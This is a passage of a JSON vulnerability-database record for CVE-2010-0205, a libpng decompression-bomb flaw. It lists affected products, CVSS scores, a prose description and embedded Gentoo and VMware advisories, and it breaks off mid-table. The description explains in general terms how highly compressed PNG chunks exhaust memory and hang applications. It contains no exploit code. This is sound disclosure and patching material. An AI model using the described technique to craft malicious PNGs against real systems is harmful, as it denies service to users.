"vendor": "redhat",
"version": "3"
},
{
"model": "messaging storage server",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"model": "player build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.5118166"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2008.0"
},
{
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.0.1"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.33"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.1"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.21"
},
{
"model": "enterprise linux es",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"model": "linux enterprise sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"model": "solaris express",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "11"
},
{
"model": "enterprise linux es",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2010.0"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "0"
},
{
"model": "linux lts sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.8"
},
{
"model": "libpng",
"scope": "ne",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.43"
},
{
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.6"
},
{
"model": "linux lts amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "player",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.5.2"
},
{
"model": "linux lts i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.5"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2009.0"
},
{
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.8"
},
{
"model": "player",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.5.3"
},
{
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.20"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.36"
},
{
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.9"
},
{
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.0"
},
{
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.14"
},
{
"model": "server build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.691891"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.2"
},
{
"model": "hat enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "red",
"version": "5"
},
{
"model": "server build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.10203137"
},
{
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.4"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.6"
},
{
"model": "linux lpia",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.3"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.12"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.32"
},
{
"model": "aura session manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2009.1"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.8"
},
{
"model": "message networking",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "11.0"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.27"
},
{
"model": "linux lts sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"model": "corporate server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "4.0"
},
{
"model": "linux enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"model": "linux enterprise sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.9"
},
{
"model": "libpng",
"scope": "ne",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.53"
},
{
"model": "enterprise linux desktop version",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.6"
},
{
"model": "linux enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.3"
},
{
"model": "player build",
"scope": "ne",
"trust": 0.3,
"vendor": "vmware",
"version": "3.1.2301548"
},
{
"model": "solaris 10 sparc",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"model": "mac os server",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.5"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.11"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3.0"
},
{
"model": "rc1",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.22"
},
{
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1.1"
},
{
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.1"
},
{
"model": "enterprise linux desktop workstation client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5"
},
{
"model": "player build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.5.3185404"
},
{
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "workstation build",
"scope": "ne",
"trust": 0.3,
"vendor": "vmware",
"version": "7.1.2301548"
},
{
"model": "linux alpha",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "server build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.9156507"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.4"
},
{
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"model": "server build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.7108231"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.2"
},
{
"model": "linux lts lpia",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.5"
},
{
"model": "workstation build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "6.5.3185404"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.34"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.18"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.7"
},
{
"model": "server build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.0.1156745"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.0"
},
{
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"model": "message networking mn",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1"
},
{
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.10"
},
{
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.1"
},
{
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.2"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.42"
},
{
"model": "linux s/390",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "7.1"
},
{
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.4"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.16"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.5"
},
{
"model": "linux lpia",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"model": "beta01",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4"
},
{
"model": "aura system manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "player",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.5.4"
},
{
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.17"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.1"
},
{
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0"
},
{
"model": "beta19",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0.3"
},
{
"model": "solaris 10 x86",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.10"
},
{
"model": "linux lpia",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.10"
},
{
"model": "workstation build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "6.5.2156735"
},
{
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.15"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.5"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2008.0"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.35"
},
{
"model": "intuity audix lx",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"model": "workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "6.5.3"
},
{
"model": "solaris 9 x86",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.37"
},
{
"model": "aura conferencing standard",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "11.2"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.8"
},
{
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"model": "solaris 9 sparc",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"model": "aura system platform sp1.1",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"model": "linux ia-32",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2010.0"
},
{
"model": "linux mipsel",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux mips",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "enterprise server x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"model": "player build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.5.2156735"
},
{
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.0"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.2"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2009.1"
},
{
"model": "aura session manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.10"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2009.0"
},
{
"model": "hat enterprise linux as",
"scope": "eq",
"trust": 0.3,
"vendor": "red",
"version": "4"
},
{
"model": "hat enterprise linux as",
"scope": "eq",
"trust": 0.3,
"vendor": "red",
"version": "3"
},
{
"model": "linux m68k",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.26"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.19"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.3"
},
{
"model": "linux ia-64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
}
],
"sources": [
{
"db": "BID",
"id": "38478"
},
{
"db": "CNNVD",
"id": "CNNVD-201003-024"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-001158"
},
{
"db": "NVD",
"id": "CVE-2010-0205"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:lunascape:lunascape",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:libpng:libpng",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:vmware:player",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:vmware:server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:vmware:workstation",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:mac_os_x",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:mac_os_x_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:oracle:solaris",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:misc:miraclelinux_asianux_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fenrir-inc:pictbear",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:enterprise_linux",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:enterprise_linux_desktop",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:rhel_desktop_workstation",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-001158"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Glenn Randers-Pehrson",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201003-024"
}
],
"trust": 0.6
},
"cve": "CVE-2010-0205",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2010-0205",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.8,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2010-0205",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-42810",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2010-0205",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#576029",
"trust": 0.8,
"value": "0.85"
},
{
"author": "NVD",
"id": "CVE-2010-0205",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201003-024",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-42810",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2010-0205",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#576029"
},
{
"db": "VULHUB",
"id": "VHN-42810"
},
{
"db": "VULMON",
"id": "CVE-2010-0205"
},
{
"db": "CNNVD",
"id": "CNNVD-201003-024"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-001158"
},
{
"db": "NVD",
"id": "CVE-2010-0205"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The png_decompress_chunk function in pngrutil.c in libpng 1.0.x before 1.0.53, 1.2.x before 1.2.43, and 1.4.x before 1.4.1 does not properly handle compressed ancillary-chunk data that has a disproportionately large uncompressed representation, which allows remote attackers to cause a denial of service (memory and CPU consumption, and application hang) via a crafted PNG file, as demonstrated by use of the deflate compression method on data composed of many occurrences of the same character, related to a \"decompression bomb\" attack. libpng Has a specific PNG ( Portable Network Graphics ) There is a problem with the file processing. libpng Contains crafted auxiliary chunks PNG When processing files, a huge amount of memory CPU May use resources. For more information, PNG Development Group Security advisories and Defending Libpng Applications Against Decompression Bombs Please confirm.Disturbance of service operation by a remote third party (DoS) An attack may be carried out. The \u0027libpng\u0027 library is prone to a remote denial-of-service vulnerability. \nSuccessful exploits will allow an attacker to consume an excessive amount of CPU memory, denying service to legitimate users. \nSuccessful exploits will allow an attacker to obtain potentially sensitive information. \nVersions prior to libpng 1.4.1, 1.2.43, and 1.0.53 are vulnerable. This resource consumption may cause applications using the libpng library to hang. The PNG format uses efficient compression to store graphic data and some related data in an auxiliary database. The PNG specification does not limit the number of chunks, limiting their size to 2.147G (2,147,483,647 bytes). Similarly, the specification limits the width and height of graphics to 2.147 billion rows and 2.147 billion columns. Since the deflate compression method can very efficiently compress data streams consisting of repeated single bytes, small PNG files may occupy a large amount of memory when decompressed, forming a \\\"decompression bomb that exhausts all available memory. For example, for a zTXt block containing 50,000 lines each containing 100 letters Z, the compressed size is about 17k bytes, but the decompressed size is 5M, and the compression ratio is about 300:1. Libpng library uses inefficient memory acquisition method when expanding compressed zTXt, iTXt and iCCP auxiliary data blocks. About 50k malformed iCCP blocks contained in graphic files can be decompressed to 60M, which will hang the browser for about 20 Minutes, a well-crafted malicious block can also hang the browser for even longer, using up all available memory. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201010-01\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Libpng: Multiple vulnerabilities\n Date: October 05, 2010\n Bugs: #307637, #324153, #335887\n ID: 201010-01\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities in libpng might lead to privilege escalation\nor a Denial of Service. It is used by several programs, including web\nbrowsers and potentially server processes. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 media-libs/libpng \u003c 1.4.3 \u003e= 1.4.3\n\nDescription\n===========\n\nMultiple vulnerabilities were found in libpng:\n\n* The png_decompress_chunk() function in pngrutil.c does not properly\n handle certain type of compressed data (CVE-2010-0205)\n\n* A buffer overflow in pngread.c when using progressive applications\n (CVE-2010-1205)\n\n* A memory leak in pngrutil.c when dealing with a certain type of\n chunks (CVE-2010-2249)\n\nImpact\n======\n\nAn attacker could exploit these vulnerabilities to cause programs\nlinked against the library to crash or execute arbitrary code with the\npermissions of the user running the vulnerable program, which could be\nthe root user. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll libpng users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=media-libs/libpng-1.4.3\"\n\nReferences\n==========\n\n [ 1 ] CVE-2010-0205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205\n [ 2 ] CVE-2010-1205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1205\n [ 3 ] CVE-2010-2249\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2249\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201010-01.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2010 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\n VMware Security Advisory\n\nAdvisory ID: VMSA-2010-0014\nSynopsis: VMware Workstation, Player, and ACE address several\n security issues. \nIssue date: 2010-09-23\nUpdated on: 2010-09-23 (initial release of advisory)\nCVE numbers: CVE-2010-3277 CVE-2010-1205 CVE-2010-0205\n CVE-2010-2249 CVE-2010-0434 CVE-2010-0425\n- ------------------------------------------------------------------------\n\n1. Summary\n\n VMware Workstation and Player address a potential installer security\n issue and security issues in libpng. VMware ACE Management Server\n (AMS) for Windows updates Apache httpd. \n\n2. Relevant releases\n\n VMware Workstation 7.1.1 and earlier,\n VMware Player 3.1.1 and earlier,\n VMware ACE Management Server 2.7.1 and earlier,\n\n Note: VMware Server was declared End Of Availability on January 2010,\n support will be limited to Technical Guidance for the duration\n of the support term. \n\n3. Problem Description\n\n a. VMware Workstation and Player installer security issue\n\n The Workstation 7.x and Player 3.x installers will load an index.htm\n file located in the current working directory on which Workstation\n 7.x or Player 3.x is being installed. This may allow an attacker to\n display a malicious file if they manage to get their file onto the\n system prior to installation. \n\n The issue can only be exploited at the time that Workstation 7.x or\n Player 3.x is being installed. Installed versions of Workstation and\n Player are not affected. The security issue is no longer present in\n the installer of the new versions of Workstation 7.x and Player 3.x\n (see table below for the version numbers). \n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2010-3277 to this issue. \n\n VMware would like to thank Alexander Trofimov and Marc Esher for\n independently reporting this issue to VMware. \n\n The following table lists what action remediates the vulnerability\n (column 4) if a solution is available. \n\n VMware Product Running Replace with/\n Product Version on Apply Patch\n ============= ======== ======= =================\n VirtualCenter any Windows not affected\n\n Workstation 7.x any 7.1.2 build 301548 or later *\n Workstation 6.5.x any 